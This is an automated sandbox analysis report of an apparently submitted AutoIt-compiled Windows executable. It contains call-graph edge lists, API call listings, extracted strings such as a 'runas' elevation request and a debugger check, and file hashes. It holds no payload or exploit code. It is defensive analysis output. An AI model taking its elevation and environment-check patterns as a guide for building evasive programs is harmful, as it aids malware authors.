type_info::_Type_info_dtor 87531->87532 87533 41dfe0 87532->87533 87534 41dffb 87532->87534 87654 417f8a 46 API calls __getptd_noexit 87533->87654 87535 41e007 87534->87535 87540 41e041 87534->87540 87656 417f8a 46 API calls __getptd_noexit 87535->87656 87538 41dfe5 87655 417f77 46 API calls 
__getptd_noexit 87538->87655 87539 41e00c 87657 417f77 46 API calls __getptd_noexit 87539->87657 87543 41e063 87540->87543 87544 41e04e 87540->87544 87545 41ae56 ___lock_fhandle 48 API calls 87543->87545 87659 417f8a 46 API calls __getptd_noexit 87544->87659 87548 41e069 87545->87548 87546 41e014 87658 417f25 10 API calls __controlfp_s 87546->87658 87550 41e077 87548->87550 87551 41e08b 87548->87551 87549 41e053 87660 417f77 46 API calls __getptd_noexit 87549->87660 87585 41da15 87550->87585 87661 417f77 46 API calls __getptd_noexit 87551->87661 87554 41dfed type_info::_Type_info_dtor 87554->87523 87557 41e083 87663 41e0ba LeaveCriticalSection __unlock_fhandle 87557->87663 87558 41e090 87662 417f8a 46 API calls __getptd_noexit 87558->87662 87562 41d900 87561->87562 87566 41d915 87561->87566 87667 417f77 46 API calls __getptd_noexit 87562->87667 87564 41d905 87668 417f25 10 API calls __controlfp_s 87564->87668 87568 41d94a 87566->87568 87575 41d910 87566->87575 87664 420603 87566->87664 87569 414139 __filbuf 46 API calls 87568->87569 87570 41d95e 87569->87570 87571 41dfcc __read 59 API calls 87570->87571 87572 41d965 87571->87572 87573 414139 __filbuf 46 API calls 87572->87573 87572->87575 87574 41d988 87573->87574 87574->87575 87576 414139 __filbuf 46 API calls 87574->87576 87575->87523 87577 41d994 87576->87577 87577->87575 87578 414139 __filbuf 46 API calls 87577->87578 87579 41d9a1 87578->87579 87580 414139 __filbuf 46 API calls 87579->87580 87580->87575 87581->87517 87582->87520 87583->87523 87584->87517 87586 41da31 87585->87586 87587 41da4c 87585->87587 87588 417f8a __set_osfhnd 46 API calls 87586->87588 87589 41da5b 87587->87589 87591 41da7a 87587->87591 87590 41da36 87588->87590 87592 417f8a __set_osfhnd 46 API calls 87589->87592 87595 417f77 __controlfp_s 46 API calls 87590->87595 87594 41da98 87591->87594 87609 41daac 87591->87609 87593 41da60 87592->87593 87596 417f77 __controlfp_s 46 API calls 87593->87596 87597 417f8a __set_osfhnd 46 API calls 
87594->87597 87598 41da3e 87595->87598 87600 41da67 87596->87600 87602 41da9d 87597->87602 87598->87557 87599 41db02 87601 417f8a __set_osfhnd 46 API calls 87599->87601 87603 417f25 __controlfp_s 10 API calls 87600->87603 87604 41db07 87601->87604 87605 417f77 __controlfp_s 46 API calls 87602->87605 87603->87598 87606 417f77 __controlfp_s 46 API calls 87604->87606 87607 41daa4 87605->87607 87606->87607 87611 417f25 __controlfp_s 10 API calls 87607->87611 87608 41dae1 87608->87599 87617 41daec ReadFile 87608->87617 87609->87598 87609->87599 87609->87608 87610 41db1b 87609->87610 87612 416b04 __malloc_crt 46 API calls 87610->87612 87611->87598 87614 41db31 87612->87614 87620 41db59 87614->87620 87621 41db3b 87614->87621 87615 41dc17 87616 41df8f GetLastError 87615->87616 87624 41dc2b 87615->87624 87618 41de16 87616->87618 87619 41df9c 87616->87619 87617->87615 87617->87616 87628 417f9d __dosmaperr 46 API calls 87618->87628 87633 41dd9b 87618->87633 87622 417f77 __controlfp_s 46 API calls 87619->87622 87625 420494 __lseeki64_nolock 48 API calls 87620->87625 87623 417f77 __controlfp_s 46 API calls 87621->87623 87626 41dfa1 87622->87626 87627 41db40 87623->87627 87624->87633 87634 41dc47 87624->87634 87637 41de5b 87624->87637 87629 41db67 87625->87629 87630 417f8a __set_osfhnd 46 API calls 87626->87630 87631 417f8a __set_osfhnd 46 API calls 87627->87631 87628->87633 87629->87617 87630->87633 87631->87598 87632 413748 _free 46 API calls 87632->87598 87633->87598 87633->87632 87635 41dcab ReadFile 87634->87635 87644 41dd28 87634->87644 87638 41dcc9 GetLastError 87635->87638 87647 41dcd3 87635->87647 87636 41ded0 ReadFile 87639 41deef GetLastError 87636->87639 87645 41def9 87636->87645 87637->87633 87637->87636 87638->87634 87638->87647 87639->87637 87639->87645 87640 41ddec MultiByteToWideChar 87640->87633 87641 41de10 GetLastError 87640->87641 87641->87618 87642 41dda3 87650 41dd60 87642->87650 87651 41ddda 87642->87651 87643 41dd96 87646 417f77 __controlfp_s 46 API 
calls 87643->87646 87644->87633 87644->87642 87644->87643 87644->87650 87645->87637 87649 420494 __lseeki64_nolock 48 API calls 87645->87649 87646->87633 87647->87634 87648 420494 __lseeki64_nolock 48 API calls 87647->87648 87648->87647 87649->87645 87650->87640 87652 420494 __lseeki64_nolock 48 API calls 87651->87652 87653 41dde9 87652->87653 87653->87640 87654->87538 87655->87554 87656->87539 87657->87546 87658->87554 87659->87549 87660->87546 87661->87558 87662->87557 87663->87554 87665 416b04 __malloc_crt 46 API calls 87664->87665 87666 420618 87665->87666 87666->87568 87667->87564 87668->87575 87672 4148b3 GetSystemTimeAsFileTime __aulldiv 87669->87672 87671 442c6b 87671->87175 87672->87671 87673->87182 87674->87188 87675->87188 87677 45272f __tzset_nolock _wcscpy 87676->87677 87678 414d04 61 API calls __fread_nolock 87677->87678 87679 44afef GetSystemTimeAsFileTime 87677->87679 87680 4528a4 87677->87680 87681 4150d1 81 API calls _fseek 87677->87681 87678->87677 87679->87677 87680->87096 87680->87097 87681->87677 87683 44b1bc 87682->87683 87684 44b1ca 87682->87684 87685 4149c2 116 API calls 87683->87685 87686 44b1e1 87684->87686 87687 4149c2 116 API calls 87684->87687 87688 44b1d8 87684->87688 87685->87684 87717 4321a4 87686->87717 87689 44b2db 87687->87689 87688->87125 87689->87686 87691 44b2e9 87689->87691 87695 44b2f6 87691->87695 87697 414a46 __fcloseall 82 API calls 87691->87697 87692 44b224 87693 44b253 87692->87693 87694 44b228 87692->87694 87721 43213d 87693->87721 87696 44b235 87694->87696 87699 414a46 __fcloseall 82 API calls 87694->87699 87695->87125 87700 44b245 87696->87700 87702 414a46 __fcloseall 82 API calls 87696->87702 87697->87695 87699->87696 87700->87125 87701 44b25a 87703 44b260 87701->87703 87704 44b289 87701->87704 87702->87700 87706 44b26d 87703->87706 87709 414a46 __fcloseall 82 API calls 87703->87709 87731 44b0bf 87 API calls 87704->87731 87707 44b27d 87706->87707 87710 414a46 __fcloseall 82 API calls 87706->87710 87707->87125 87708 
44b28f 87732 4320f8 46 API calls _free 87708->87732 87709->87706 87710->87707 87712 44b295 87713 44b2a2 87712->87713 87714 414a46 __fcloseall 82 API calls 87712->87714 87715 44b2b2 87713->87715 87716 414a46 __fcloseall 82 API calls 87713->87716 87714->87713 87715->87125 87716->87715 87718 4321cb 87717->87718 87720 4321b4 __tzset_nolock _memmove 87717->87720 87719 414d04 __fread_nolock 61 API calls 87718->87719 87719->87720 87720->87692 87722 4135bb _malloc 46 API calls 87721->87722 87723 432150 87722->87723 87724 4135bb _malloc 46 API calls 87723->87724 87725 432162 87724->87725 87726 4135bb _malloc 46 API calls 87725->87726 87727 432174 87726->87727 87729 432189 87727->87729 87733 4320f8 46 API calls _free 87727->87733 87729->87701 87730 432198 87730->87701 87731->87708 87732->87712 87733->87730 87734->87014 87735->87015 87736->87034 87737->87034 87738->87034 87739->87026 87740->87034 87741->87034 87742->87039 87743->87049 87744->87048 87745->87048 87747 40e959 87746->87747 87751 40e84f 87746->87751 87748 408f40 VariantClear 87747->87748 87749 40e95e 87748->87749 87750 4115d7 52 API calls 87749->87750 87750->87751 87751->87056 87751->87058 87752->87056 87802 410160 87753->87802 87755 41012f GetFullPathNameW 87756 410147 moneypunct 87755->87756 87756->86870 87758 4102cb SHGetDesktopFolder 87757->87758 87761 410333 _wcsncpy 87757->87761 87759 4102e0 _wcsncpy 87758->87759 87758->87761 87760 41031c SHGetPathFromIDListW 87759->87760 87759->87761 87760->87761 87761->86873 87763 4101bb 87762->87763 87770 425f4a 87762->87770 87764 410160 52 API calls 87763->87764 87765 4101c7 87764->87765 87806 410200 52 API calls 2 library calls 87765->87806 87766 4114ab __wcsicoll 58 API calls 87766->87770 87768 4101d6 87807 410200 52 API calls 2 library calls 87768->87807 87769 425f6e 87769->86875 87770->87766 87770->87769 87772 4101e9 87772->86875 87774 40f760 128 API calls 87773->87774 87775 40f584 87774->87775 87776 429335 87775->87776 87777 40f58c 87775->87777 87780 4528bd 118 API 
calls 87776->87780 87778 40f598 87777->87778 87779 429358 87777->87779 87818 4033c0 113 API calls 7 library calls 87778->87818 87819 434034 86 API calls _wprintf 87779->87819 87783 42934b 87780->87783 87786 429373 87783->87786 87787 42934f 87783->87787 87784 429369 87784->87786 87785 40f5b4 87785->86872 87788 4115d7 52 API calls 87786->87788 87789 431e58 82 API calls 87787->87789 87801 4293c5 moneypunct 87788->87801 87789->87779 87790 42959c 87791 413748 _free 46 API calls 87790->87791 87792 4295a5 87791->87792 87793 431e58 82 API calls 87792->87793 87794 4295b1 87793->87794 87798 401b10 52 API calls 87798->87801 87801->87790 87801->87798 87808 444af8 87801->87808 87811 44b41c 87801->87811 87820 44c7dd 64 API calls 3 library calls 87801->87820 87821 402780 87801->87821 87829 4022d0 52 API calls moneypunct 87801->87829 87803 410167 _wcslen 87802->87803 87804 4115d7 52 API calls 87803->87804 87805 41017e _wcscpy 87804->87805 87805->87755 87806->87768 87807->87772 87809 4115d7 52 API calls 87808->87809 87810 444b27 _memmove 87809->87810 87810->87801 87812 44b429 87811->87812 87813 4115d7 52 API calls 87812->87813 87814 44b440 87813->87814 87815 44b45e 87814->87815 87816 401b10 52 API calls 87814->87816 87815->87801 87817 44b453 87816->87817 87817->87801 87818->87785 87819->87784 87820->87801 87823 402827 87821->87823 87827 402790 moneypunct _memmove 87821->87827 87822 4115d7 52 API calls 87825 402797 87822->87825 87824 4115d7 52 API calls 87823->87824 87824->87827 87826 4115d7 52 API calls 87825->87826 87828 4027bd 87825->87828 87826->87828 87827->87822 87828->87801 87829->87801 87831 402417 87830->87831 87836 402539 moneypunct 87830->87836 87832 4115d7 52 API calls 87831->87832 87831->87836 87833 402443 87832->87833 87834 4115d7 52 API calls 87833->87834 87835 4024b4 87834->87835 87835->87836 87859 402880 95 API calls 2 library calls 87835->87859 87860 4022d0 52 API calls moneypunct 87835->87860 87836->86879 87844 401566 87839->87844 87840 401794 87861 40e9a0 90 API 
                                                                        Control-flow Graph (edge list exported from the interactive graph viewer; the rendered graph is not recoverable from this text)
                                                                        APIs
                                                                        • _wcslen.LIBCMT ref: 004096C1
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • _memmove.LIBCMT ref: 0040970C
                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                        • _memmove.LIBCMT ref: 00409D96
                                                                        • _memmove.LIBCMT ref: 0040A6C4
                                                                        • _memmove.LIBCMT ref: 004297E5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                        • String ID:
                                                                        • API String ID: 2383988440-0
                                                                        • Opcode ID: c3d1726ec1bf21ff344278e3f3d6c1e2cb60dcce04ae326530f188bd7e2b315d
                                                                        • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                        • Opcode Fuzzy Hash: c3d1726ec1bf21ff344278e3f3d6c1e2cb60dcce04ae326530f188bd7e2b315d
                                                                        • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                          • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                                          • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                        • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                        • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                          • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                        • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                        • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                        • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                          • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                          • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                          • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                          • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                          • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                          • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                          • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                          • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                          • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                          • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                          • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                          • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                        Strings
                                                                        • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                                        • runas, xrefs: 0042E2AD, 0042E2DC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                        • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                        • API String ID: 2495805114-3383388033
                                                                        • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                        • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                        • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                        • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                                                                         Control-flow Graph (rendered image; legend: Executed / Not Executed). Basic blocks 0046CB5F-0046CEF0, with calls to OleInitialize, CLSIDFromProgID, CLSIDFromString, CoCreateInstance, CoInitializeSecurity, CoCreateInstanceEx, CoTaskMemFree and CoSetProxyBlanket, and subcalls to 00458651, 00468070 and 00465177.
                                                                        APIs
                                                                        • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                        • CLSIDFromProgID.COMBASE(?,?), ref: 0046CBDF
                                                                        • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                        • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                        • _wcslen.LIBCMT ref: 0046CDB0
                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                        • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                        • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                          • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                          • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                          • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                        Strings
                                                                        • NULL Pointer assignment, xrefs: 0046CEA6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                        • String ID: NULL Pointer assignment
                                                                        • API String ID: 440038798-2785691316
                                                                        • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                        • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                        • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                        • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95

                                                                         Control-flow Graph (rendered image; legend: Executed / Not Executed). Basic blocks 0040E500-0040E65D plus an out-of-line region 00427625-004276DF, with calls to GetVersionExW, GetCurrentProcess, GetSystemInfo, GetNativeSystemInfo and FreeLibrary.
                                                                        APIs
                                                                        • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                        • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                        • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                        • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                        Strings
                                                                        Memory Dump Source
                                                                         • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                        • String ID: 0SH$Wu
                                                                        • API String ID: 3363477735-1135818761
                                                                        • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                        • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                        • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                        • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                        APIs
                                                                        • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                        • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: IsThemeActive$uxtheme.dll
                                                                        • API String ID: 2574300362-3542929980
                                                                        • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                        • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                        • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                        • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                        APIs
                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                        • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: FreeInfoLibraryParametersSystem
                                                                        • String ID: Wu
                                                                        • API String ID: 3403648963-4083010176
                                                                        • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                        • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                        • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                        • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                        APIs
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                        • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                        • TranslateMessage.USER32(?), ref: 00409556
                                                                        • DispatchMessageW.USER32(?), ref: 00409561
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Peek$DispatchSleepTranslate
                                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                        • API String ID: 1762048999-758534266
                                                                        • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                        • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                        • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                        • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • __wcsicoll.LIBCMT ref: 00402007
                                                                        • __wcsicoll.LIBCMT ref: 0040201D
                                                                        • __wcsicoll.LIBCMT ref: 00402033
                                                                          • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                        • __wcsicoll.LIBCMT ref: 00402049
                                                                        • _wcscpy.LIBCMT ref: 0040207C
